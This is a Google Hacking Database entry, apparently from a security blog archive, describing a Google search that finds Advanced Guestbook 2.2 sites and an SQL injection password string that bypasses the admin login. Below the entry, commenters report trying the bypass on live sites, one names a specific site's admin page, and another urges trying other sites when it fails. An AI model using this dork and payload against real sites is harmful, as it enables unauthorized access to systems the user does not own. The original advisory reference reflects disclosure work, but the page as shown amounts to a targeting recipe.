GHDB « Hackers For Charity

GHDB

GHDB

Google Search: intitle:guestbook “advanced guestbook 2.2 powered”

ThrowedOff rates this entry 6 out of 10.
Submitted: 2004-05-12 00:00:00
Added by: ThrowedOff
Hits: 10749
Score: 6

Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. AttackerFrom there, hit “Admin” then do the following:Leave username field blank.For password, enter this exactly:’) OR (‘a’ = ‘aYou are now in the Guestbook’s Admin section.http://www.securityfocus.com/bid/10209


Comments:

2004-05-27 18:29:44 (Anonymous): I’m quite amazed that such a simple sql injection still works on so many sites nowadays. It will work with just about /every/ result that google pulls up

2004-05-30 09:53:12 (Fr0zen): This works perfectly, but i see i was not the first who has already tried it :)

2004-12-25 10:51:00 (vinny): Yeah, Sorry but i’m a noob and it’s maby stupid
but it’s not working by me.
What do i wrong ?

I search i google ? then exampl:
http://benjaminroldan.com/forum/admin.php
then i leave the username emty
en for the password i fill: ‘) OR (‘a’ = ‘a (between the // in).


and i get an error Access Denied ?
Or SQl Error ?

Wat i doing wrong ?
Ps: Srry for my bad english


2005-08-18 20:43:18 (JTR000): that one site was secured against it.
try others.



5 Responses to “GHDB”

  1. Jack says:

    Does GHDB still updates for now?

  2. Johnny says:

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:

    Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???

  4. Johnny says:

    The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:

    Is any offline view-able resources is available of this product ?

Leave a Reply